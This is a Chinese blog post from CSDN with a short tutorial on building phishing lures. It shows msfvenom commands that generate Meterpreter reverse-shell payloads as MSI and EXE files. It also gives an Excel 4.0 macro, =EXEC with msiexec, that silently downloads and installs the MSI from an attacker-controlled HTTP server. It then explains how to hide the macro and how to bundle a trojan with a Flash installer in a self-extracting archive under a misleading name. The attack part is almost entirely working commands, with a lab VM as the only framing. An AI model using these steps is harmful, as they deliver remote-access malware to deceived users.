制作简单的钓鱼样本

最新推荐文章于 2024-08-27 13:48:21 发布
最新推荐文章于 2024-08-27 13:48:21 发布
阅读量140 收藏 3
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63715632/article/details/134859457
版权
本文描述了黑客如何使用Excel宏制作恶意MSI文件,将其与正常软件捆绑进行钓鱼,通过Python开启HTTP服务,利用受害者启用宏时执行Meterpreter木马,最终在Win7虚拟机中获取shell。
摘要由CSDN通过智能技术生成

excel

msf生成恶意的msi文件

msfvenom -p windows/x64/meterpreter/reverse_tcp lhsot=192.168.85.129 lport=13666 -f msi -o diaoyu.msi

制作excel

选择插入宏表

第一行输入

=EXEC("msiexec /q /i http://192.168.85.129/diaoyu.msi")

表示调用服务器上的msi

第二行输入

=HALT()

标识Excel 4.0宏结束

再隐藏宏

将名字改为容易混淆的

python在具有恶意的msi的文件夹下开启http服务

启动msf监听

目标访问excel且启用宏功能时

获取shell

常规软件捆绑远控木马进行钓鱼

制作msf木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.85.129 LPORT=13333 -f exe -o flash.exe

把木马和正常的flash 进行压缩

放在一起用winrar添加到压缩文件

起一个容易混淆的名字

把做好的恶意flash放到win7虚拟机中运行

启动msf进行监听

win7 运行自解压后就获取到shell

及时行乐.282
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
计算机安全管理制度样本.doc
12-17
9. 安全培训和意识:定期进行员工安全培训,提高他们对网络安全威胁的认识,教育他们如何识别和避免钓鱼邮件、恶意软件等风险。 10. 第三方供应商管理:对与组织合作的第三方供应商进行安全评估,确保他们的系统和...
网络渗透测试技术
m0_64112419的博客
12-09 1008
只有深入了解目标用户的行为习惯、偏好和心理特点,我们才能制作出更具诱惑力和迷惑性的钓鱼样本,从而提高攻击的成功率。通过加强用户的安全培训和教育,提高他们对钓鱼攻击的识别能力和防范意识,可以有效降低钓鱼攻击的成功率,从而保护用户的信息安全。只有深入了解目标用户的行为特点和心理状态,我们才能更好地制作钓鱼样本,并增加其诱惑力,从而提高钓鱼攻击的成功率。因此,在进行钓鱼攻击前,我们需要投入更多的精力和时间来研究目标用户的行为习惯和心理特点,以确保钓鱼攻击的有效性和成功率。2.将正常的软件和恶意木马进行捆绑打包。
对某钓鱼样本分析
vspiders的博客
08-10 367
HVV期间遇到一个钓鱼样本,用IDA简单分析下样本逻辑及C2信息。
初入门径 --- 护网钓鱼样本分析
abelxu
06-02 609
最近半个月都在学《恶意代码分析实战》,想拿真实的恶意软件进行分析一下。正好朋友发了一个过来。(应该是护网的钓鱼文件) 0x01 文件分析 总共包括三个文件:2021年机关员工(子女)名单.exe、name1.jpg、name2.jpg 2021年机关员工(子女)名单.exe:程序是golang编译的,分析起来有点困难。所以没有进行分析,只是看了一下会有什么行为。 name1.jpg为exe name2.jpg为dll导出了InitBugReport函数,且该函数存在异或解密shellcode的行为。 0
内网渗透神器CobaltStrike之钓鱼攻击(六)
xf555er的博客
11-22 2860
office钓鱼在无需交互、用户无感知的情况下,执行Office文档中内嵌的一段恶意代码,从远控地址中下载并运行恶意可执行程序,例如远控木马或者勒索病毒等。Cobalt Strike office钓鱼主要方法是生成一段vba代码,然后将代码复制到office套件中,当用户启动office自动运行lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。lnk钓鱼主要将图标伪装成正常图标,但是目标会执行shell命令。
网站信息安全自查表样本.doc
12-17
11. **员工培训**:确认员工是否接受过网络安全培训,了解基本的防范措施,如识别钓鱼邮件,不随意点击未知链接。 12. **应急响应计划**:制定并演练应急响应计划,以应对安全事件,如数据泄露、系统被黑等。 13. ...
网站制作过程
05-11
由于本系统涉及页面较少、目录结构比较简单,因此采用导航控件中的Menu控件、SiteMapPath控件、TreeView控件都可以轻松地实现导航功能,其中Menu控件使用较为方便。 在统一页面风格时,需要考虑如何采用怎样的设计...
多人钓鱼船的制作方法.docx
11-18
"多人钓鱼船的制作方法" 多人钓鱼船是指一种小型的手提式轻巧旅游艇,轻松地丢进后备箱或固定在车顶上,用于旅游时水上交通轻巧运送工具。这种船具有平安牢靠、操纵简便的特点,适用范围包括海面清闲、公园巡游、...
数据集VOC格式岸边垂钓钓鱼fishing目标检测数据集-4330张
12-27
数据集格式:Pascal VOC格式(不包含分割...重要说明:检测岸边钓鱼人员的数据集,当有人拿个鱼竿或者明显在钓鱼则会被标注 特别声明:本数据集不对训练的模型或者权重文件精度作任何保证,数据集只提供准确且合理标注
CVE-2017-11882钓鱼样本构造
weixin_30537391的博客
08-03 136
前言 漏洞详情: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about 最近的一个影响很广泛的漏洞。 据说影响范围: Office 365 Microsoft Office 2000 Microsoft Office 2003 ...
记一次粗浅的钓鱼样本分析过程
蚁景网安学院
08-19 614
原创稿件征集 邮箱:edu@antvsion.com QQ:3200599554 黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析,稿件通过并发布还能收获200-800元不等的稿酬。 0x00 前言 一切的一切要从 (盘古开天辟地) 几个月前的某大型网安活动期间说起。话说当时一位素未谋面的基友给在下发了一个疑似钓鱼样本,说是让我试试看下能不能溯源出攻击方。于是虽然作为一名萌新,此前也从未接触过类似的工作,但想到既然是基友的请求,那也唯有欣然接受了。不过值得庆幸的是,最后虽然折腾了大半.
证券行业加密业务安全风险监测与防御技术研究
qq_61863348的博客
08-27 578
摘要:解决证券⾏业加密流量威胁问题、加密流量中的应⽤⻛险问题,对若⼲证券⾏业的实际流量内容进⾏调研分析, 分析了证券⾏业加密流量⾯临的合规性⻛险和加密协议及证书本⾝存在的⻛险、以及可能存在的外部加密流量威 胁,并提出防御策略和措施。关键字:证券加密业务、加密应用、加密流量、商用密码安全评估、加密风险、加密威胁、监测防御数据爆发式增长的DT(Data technology)时代,加密技术是数据传输的重要保护手段。随着互联网和企业内部流量场景的加密化趋势快速增长,证券行业也面临着更加迫切的加密需求。证券行业涉及
【第79课】服务攻防-中间件安全&IIS&Apache&Tomcat&Nginx&弱口令&错误配置&CVE
Lucker_YYY的博客
08-24 1024
免责声明本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。知识点1、中间件-IIS-短文件&解析&&写权限。
ChaCha20:高效且安全的流密码算法
jiamisoft的博客
08-23 522
ChaCha20作为一种现代流密码算法,以其高速性能和良好的安全性,在信息安全领域占据了一席之地。随着技术的发展,ChaCha20将继续在保护数据安全方面发挥重要作用。同时,随着量子计算技术的进步,我们也需要关注ChaCha20等现有加密算法在量子时代的安全性,并积极探索新的加密技术。
EV代码签名证书——消除软件下载时的安全警告
最新发布
joySSL_的博客
08-27 604
开发公司和软件开发人员在发布应用程序后,当用户尝试下载并安装应用程序时,被SmartScreen识别为不常见或尚未建立起良好的信誉度,系统就会发出警告,提示用户该应用程序可能对电脑构成风险。最后在选择代码签名证书时一定要选择受信任的CA颁发的证书,否则部署完成之后无法被Windows识别还是一样会提示安全风险,可以先向JoySSL提交代码签名证书需求,如果不知道如何选择代码签名证书,也会有工作人员协助建议。:CA机构会发出代码签名证书Ukey,在收到证书后,你需要在相应的开发环境中安装证书。
Day98:云上攻防-云原生篇&K8s安全&Config泄漏&Etcd存储&Dashboard鉴权&Proxy暴露
m0_74402888的博客
08-24 1624
实战中不会常见,利用条件比较苛刻。默认通过证书认证,起一个数据库作用。主要存放节点的数据,如一些token和证书。攻击23791端口配置映射:第二种:在打开证书校验选项后,通过本地127.0.0.1:2379可免认证访问Etcd服务,但通过其他地址访问要携带cert(证书)进行认证访问,一般配合ssrf或其他利用,较为鸡肋。只能本地访问,直接未授权访问获取secrets和token利用。
物联网设备在等保测评中的安全考量
2301_79955948的博客
08-27 490
对物联网设备进行全面的漏洞分析,包括硬件和软件的漏洞,查找弱密码、默认凭证、未经身份验证的远程访问、未修复的安全漏洞等。:分析物联网设备与其他设备或服务器进行通信的安全性,检查通信协议的安全性、认证机制的可靠性、数据传输的加密与完整性保护等。:评估物联网设备对用户隐私的保护程度,检查设备是否收集和传输了不必要的用户信息,是否采用了加密和匿名化机制等。:评估设备的远程管理功能的安全性,包括远程升级、配置和监控等,检查设备远程管理的认证和授权机制是否安全可靠。
密码管理最佳实践:安全存储与定期更换的艺术
A526847的博客
08-27 384
在数字化时代,密码作为我们个人信息与资产安全的第一道防线,其重要性不言而喻。然而,随着网络威胁日益复杂多样,仅仅设置一个强密码已不足以保障安全。良好的密码管理实践,特别是安全存储与定期更换密码,成为了维护个人与企业安全的关键。本文将深入探讨这两项密码管理艺术的精髓。
如果在微步云沙箱上传了还未公布的测试钓鱼样本怎么办
07-15
如果您意外地在微步云沙箱上传了尚未公布的测试钓鱼样本,您应该立即联系微步云沙箱的开发者或支持团队。向他们说明情况,并请求他们删除您上传的样本。 微步云沙箱的开发者和支持团队通常会有相应的措施来保护用户...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值